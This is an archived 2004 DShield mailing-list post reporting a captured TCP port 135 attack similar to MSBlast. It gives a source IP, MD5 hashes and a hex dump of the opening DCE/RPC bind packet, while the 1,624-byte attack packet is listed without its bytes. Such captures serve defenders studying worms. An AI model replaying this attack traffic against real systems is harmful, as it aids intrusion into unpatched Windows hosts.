[Dshield] TCP Port 135 Attack Capture

Blake McNeill mcneillb at linklogger.com
Wed Mar 10 14:26:02 GMT 2004


Port Peeker capture of the latest TCP Port 135 attack.  Note this is similar
but different than MSBlast.


The Scan
----------

68.145.74.189 : 3574 TCP Data In Length 72 bytes
MD5 = A26B51F9DD5297B37E393FF0610C0DEA
---- 10/03/2004 07:09:23.730
0000   05 00 0B 03 10 00 00 00 48 00 00 00 7F 00 00 00   ........H......
0010   D0 16 D0 16 00 00 00 00 01 00 00 00 01 00 01 00   ................
0020   A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46   ...............F
0030   00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00   .....]..........
0040   2B 10 48 60 02 00 00 00                           +.H`....


The Attack
------------

68.145.74.189 : 3574 TCP Data In Length 1624 bytes
MD5 = 8AD97DE838088EE11665D54841FEF2B3
---- 10/03/2004 07:09:23.790


Blake McNeill
Link Logger Product Manager
http://www.LinkLogger.com

PS PortPeeker is a freeware port sniffing utility available on our website.





